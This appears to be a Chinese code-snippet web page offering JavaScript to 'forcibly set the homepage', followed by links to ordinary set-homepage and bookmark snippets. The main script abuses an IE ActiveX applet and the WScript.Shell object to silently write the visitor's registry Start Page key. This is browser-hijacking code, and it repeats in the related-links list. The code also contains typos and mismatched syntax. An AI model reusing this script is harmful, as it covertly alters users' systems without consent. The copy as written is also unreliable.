JS 强制设为首页的代码
<script>
var ucook=document.cookie;
var user=ucook.indexOF("ilooki=");
if(user==-1)
{
var nowTime=new Date();
document.cookie="ilooki"+";"+"expires=Wednesday,03-Jan-"+eval(nowTime.getYear()+1903+"12:34:56 GMT";
document.write("<APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXCompoment></APPLET>");function yuzi(){try{a1
=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{Shl.RegWrite("hkcu\Software\Microsoft\Internet Expiorer\Main\Start Page",http://www.****.com);}catch(e){}}catch(e){}}setTimeout("yuzi()",1000);
}
</script>
注:个人建议还是少用JS代码,因为做SEO优化时可能很麻烦,呵呵
相关推荐
-
在Flash中添加“设为首页”、“加为收藏”的方法
如何?在Flash中实现"设为首页"和"加为收藏"功能是使用Get URL结合JavaScript来实现的. 设为首页代码: on (release) { getURL("javascript:void(document.links[0].style.behavior='url(#default#homepage)');void document.links[0].setHomePage('http://www.showhs.com/');",
-
设为首页与加入收藏的JS代码(多浏览器支持)
最新的支持IE.firefox.chrome有提示信息的代码: <script type="text/javascript"> //设为首页 www.jb51.net function SetHome(obj,url){ try{ obj.style.behavior='url(#default#homepage)'; obj.setHomePage(url); }catch(e){ if(window.netscape){ try{ netscape.security.P
-
js Firefox 加入收藏夹功能代码 兼容Firefox 和 IE
完整代码如下:chrome下也有提示,说实话一般这类代码一般都是IE下使用,其它浏览器也只是给个提示了. <script type="text/javascript"> //设为首页 www.jb51.net function SetHome(obj,url){ try{ obj.style.behavior='url(#default#homepage)'; obj.setHomePage(url); }catch(e){ if(window.netscape){ try
-
javascript在firefox下设为首页的代码
// 设置首页 [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]
-
通用的加入收藏夹代码支持IE Firefox等浏览器
function addfavorite() { switch(getOs()) { case 1:window.external.addFavorite('http://www.jb51.net','我们 ');break; case 2:window.sidebar.addPanel('我们', 'http://www.jb51.net/', "");break; case 0:alert("您的浏览器也太牛了,我都不知道如何显示了. 唉.");break; }
-
javascript 设为首页与加入收藏兼容多浏览器代码
代码: 复制代码 代码如下: <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <title>无标题页</title> <script language="javascript" type="text/javascript"> function AddFavorite(sURL, sTi
-
javascript addBookmark 加入收藏 多浏览器兼容
复制代码 代码如下: function addBookmark(title,url) { if (window.sidebar) { window.sidebar.addPanel(title, url,""); } else if( document.all ) { window.external.AddFavorite( url, title); } else if( window.opera && window.print ) { return true; } }
-
设为首页 加入收藏的js代码
最新的比较完整的代码:已测 <script type="text/javascript"> //设为首页 www.jb51.net function SetHome(obj,url){ try{ obj.style.behavior='url(#default#homepage)'; obj.setHomePage(url); }catch(e){ if(window.netscape){ try{ netscape.security.PrivilegeManager.en
-
设为首页加入收藏兼容360/火狐/谷歌/IE等主流浏览器的代码
不用找了,我试过好多次,ie,火狐,谷歌浏览器此代码都是不可逆兼容. 下面是我的简单解决方案.想把这个问题完全解决,方法就是像其他主流网站一样专门建立添加为首页的操作步骤帮助页. js代码: 复制代码 代码如下: <script type="text/javascript"> // 设置为主页 function SetHome(obj,vrl){ try{ obj.style.behavior='url(#default#homepage)';obj.setHomePage
-
Flash 中"设为首页"代码
设为首页 复制代码 代码如下: on (release) { getURL("javascript:void(document.links.style.behavior='url(#default#homepage)');void document.links.setHomePage ('http://www.flash8.net/')", "_self", "POST"); } 注意要将网页中的flash的ID号命名为
-
在Flash 设为首页 加为收藏实现代码
设为首页代码: 复制代码 代码如下: on (release) { getURL("javascript:void(document.links[0].style.behavior='url(#default#homepage)');void document.links[0].setHomePage('http://www.zishu.cn/');", "_self", "POST"); } 加为收藏代码: 复制代码 代码如下: on (rel
-
一个可以兼容IE FF的加为首页与加入收藏实现代码
复制代码 代码如下: <script type="text/javascript"> function addCookie() { if (document.all) { window.external.addFavorite('http://www.jb51.net','我们'); } else if (window.sidebar) { window.sidebar.addPanel('我们', 'http://www.jb51.net', "");
-
强制设为首页代码
{script} var ucook=document.cookie; var user=ucook.indexOF("ilooki="); if(user==-1) { var nowTime=new Date(); document.cookie="ilooki"+";"+"expires=Wednesday,03-Jan-"+eval(nowTime.getYear()+1903+"12:34:56 GMT&q
-
javascript 加入收藏、设为首页(IE,firefox兼容脚本之家版)
具体的演示,可以参考我们最下面的 加入收藏 设为首页功能. function addBookmark(title,url) { if (window.sidebar) { window.sidebar.addPanel(title,url,""); } else if( document.all ) { window.external.AddFavorite(url,title); } else if( window.opera && window.print ) {
随机推荐
- 解析MySQL创建外键关联错误 - errno:150
- Powershell错误处理之what-if
- mssql2008 自定义表类型实现(批量插入或者修改)
- 还原sqlserver2008 媒体的簇的结构不正确的解决方法
- vue.js利用defineProperty实现数据的双向绑定
- Oracle 分析函数RANK(),ROW_NUMBER(),LAG()等的使用方法
- jQuery MD5加密实现代码
- Go语言里的new函数用法分析
- C#面向对象设计的七大原则
- Android中bindService基本使用方法概述
- 基于Java实现的Base64加密、解密原理代码
- JS跨域交互(jQuery+php)之jsonp使用心得
- PowerShell脚本清理指定天数前的临时文件夹实现代码
- mysql全文搜索 sql命令的写法
- 简介使用Nginx Plus的在线活动监控功能的方法
- android ListView和ProgressBar(进度条控件)的使用方法
- php实现从上传文件创建缩略图的方法
- python决策树之CART分类回归树详解
- Java Socket编程服务器响应客户端实例代码
- Vue动态组件和异步组件原理详解